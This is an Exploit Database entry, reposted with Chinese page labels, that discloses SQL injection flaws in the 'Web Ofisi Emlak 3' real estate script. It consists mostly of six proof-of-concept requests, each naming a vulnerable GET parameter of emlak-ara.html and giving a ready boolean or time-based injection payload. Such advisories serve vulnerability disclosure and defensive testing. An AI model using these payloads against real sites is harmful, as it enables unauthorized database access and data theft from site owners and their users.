Web Ofisi Emlak 3 – ’emlak_durumu’ SQL Injection

• Exploit Database
• 109 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2019-07-19
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/47142/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51

  # Exploit Title: Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection # Date: 2019-07-19 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v3.html # Demo Site: http://demobul.net/emlakv3/ # Version: V2 # Tested on: Kali Linux # CVE: N/A   ----- PoC 1: SQLi -----   Request: http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet Vulnerable Parameter: emlak_durumu (GET) Payload: -1' OR 3*2*1=6 AND 000744=000744 --   ----- PoC 2: SQLi -----   Request: http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet Vulnerable Parameter: emlak_tipi (GET) Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z   ----- PoC 3: SQLi -----   Request: http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet Vulnerable Parameter: il (GET) Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z   ----- PoC 4: SQLi -----   Request: http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet Vulnerable Parameter: ilce (GET) Payload: -1' OR 3*2*1=6 AND 000397=000397 --   ----- PoC 5: SQLi -----   Request: http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet Vulnerable Parameter: kelime (GET) Payload: -1' OR 3*2*1=6 AND 000397=000397 --   ----- PoC 6: SQLi -----   Request: http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet Vulnerable Parameter: semt (GET) Payload: -1' OR 3*2*1=6 AND 000531=000531 --